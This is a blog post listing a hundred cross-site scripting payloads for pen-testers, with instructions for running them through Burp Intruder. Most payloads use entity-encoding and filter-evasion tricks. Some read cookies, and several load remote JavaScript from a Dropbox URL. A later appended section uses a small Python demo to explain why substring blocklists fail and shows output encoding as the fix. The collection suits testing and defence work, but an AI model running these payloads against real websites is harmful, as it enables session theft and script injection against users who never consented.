XSS payloads you may need as a pen-tester

Below you can find a hundred XSS payloads that you can use to find XSS bugs in web applications.

There are also really good ones by RSnake (of Slowloris fame), which he has donated to OWASP; they can be found here: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

I use these as a list within Burp Intruder. You can add these to Burp using the following options:

1. Send the request you want to analyse to Burp Intruder by right-clicking (or command-clicking) on the intercepted request/response

2. Go to Burp Intruder > Payloads, set Payload Type to Simple List, and paste the list into Payload Options

3. Start attack

So, here goes:

All the attack payloads work like a charm in Chrome 🙂 I have also noted the browser name alongside the payloads that don't work in Chrome.

1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

5) <img/src=`%00` onerror=this.onerror=confirm(1)

6) <form><isindex formaction="javascript&colon;confirm(1)"

7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;

8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00

13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X

20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>

21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

24) http://www.google<script .com>alert(document.location)</script

25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

26) <img/src=@&#32;&#13; onerror = prompt('&#49;')

27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

30) &#00;</form><input type&#61;"date" onfocus="alert(1)">

31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

35) <script ~~~>alert(0%0)</script ~~~>

36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

42) <div/style="width:expression(confirm(1))">X</div> {IE7}

43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)

44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>"<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>

53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

57) <var onmouseover="prompt(1)">On Mouse Over</var>

58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

59) <img src="/" =_=" title="onerror='prompt(1)'">

60) <%<!--'%><script>alert(1);</script -->

61) <script src="data:text/javascript,alert(1)"></script>

62) <iframe/src \/\/onload = prompt(1)

63) <iframe/onreadystatechange=alert(1)

64) <svg/onload=alert(1)

65) <input value=<><iframe/src=javascript:confirm(1)

66) <input type="text" value=" <div/onmouseover='alert(1)'>X</div>

67) http://www.<script>alert(1)</script .com

68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

69) <svg><script ?>alert(1)

70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

71) <img src=`xx:xx`onerror=alert(1)>

72)

73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

74) <math><a xlink:href="//jsfiddle.net/t846h/">click

75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

76) <svg contentScriptType=text/vbs><script>MsgBox+1

77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

83) <script>+-+-1-+-+alert(1)</script>

84) <body/onload=&lt;!--&gt;&#10alert(1)>

85) <script itworksinallbrowsers>/*<script* */alert(1)</script

86) <img src ?itworksonchrome?\/onerror = alert(1)

87) <svg><script>//&NewLine;confirm(1);</script </svg>

88) <svg><script onlypossibleinopera:-)> alert(1)

89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

90) <script x> alert(1) </script 1=2

91) <div/onmouseover='alert(1)'> style="x:">

92) <--`<img/src=` onerror=alert(1)> --!>

93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

95) "><img src=x onerror=window.open('https://www.google.com/');>

96) <form><button formaction=javascript&colon;alert(1)>CLICKME

97) <math><a xlink:href="//jsfiddle.net/t846h/">click

98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

Please ensure you remove spaces before hitting enter in the browser, or add a "+" or %3d or something like that.
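Many of the payloads above rely on HTML entities (&Tab;, &NewLine;, &colon;, &lpar;, numeric &#111;&#110;) so that the raw request never contains the literal token a filter is searching for, while the browser decodes them back before acting on them. The following added example (not part of the original post) approximates that decoding in Python with html.unescape over three constructed samples in the same style, to show why a substring blocklist on raw input misses them and why contextual output encoding (html.escape) is the fix regardless of how the input was encoded.

```python
import html

# Constructed samples (not taken from the list) using the same entity tricks:
# &Tab; inside a javascript: URL, an entity-encoded event handler name, and
# &colon;/&lpar;/&rpar; standing in for punctuation.
SAMPLES = [
    '<iframe src="&Tab;javascript:prompt(1)&Tab;">',
    '<svg &#111;&#110;load=alert(1)>',
    '<a href="javascript&colon;alert&lpar;1&rpar;">X</a>',
]

# Tokens a naive input filter might look for in the raw request body.
BLOCKLIST = ("javascript:", "onload=", "onerror=")


def naive_blocklist_hit(value: str) -> bool:
    """Weak filter: case-insensitive substring match on the still-encoded input."""
    lower = value.lower()
    return any(token in lower for token in BLOCKLIST)


def browser_view(value: str) -> str:
    """Approximation of what the browser acts on: HTML5 named and numeric
    entities decoded (html.unescape knows &Tab;, &colon;, &lpar; ...), then the
    tab/newline characters that the URL parser strips from a scheme removed."""
    decoded = html.unescape(value)
    return decoded.replace("\t", "").replace("\n", "").replace("\r", "")


def encode_for_html(value: str) -> str:
    """The fix for an HTML text or quoted-attribute context: escape the
    characters that change parsing instead of guessing at bad tokens."""
    return html.escape(value, quote=True)


def evaluate(samples):
    """Per sample: caught raw by the blocklist? an attack once decoded?
    and free of tag/quote characters after output encoding?"""
    return [
        {
            "raw_blocked": naive_blocklist_hit(s),
            "decoded_blocked": naive_blocklist_hit(browser_view(s)),
            "encoded_safe": not any(c in encode_for_html(s) for c in '<>"'),
        }
        for s in samples
    ]


if __name__ == "__main__":
    for sample, result in zip(SAMPLES, evaluate(SAMPLES)):
        print(browser_view(sample), result)
```

Only the first sample, which still carries a literal javascript:, trips the raw blocklist; all three read as attacks after decoding, and all three are inert after html.escape.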

Hope you find these XSS payloads useful for your upcoming pen-tests.

1 Comment

  • Yahya

    March 30, 2016 at 5:49 am

    Thank you so much man
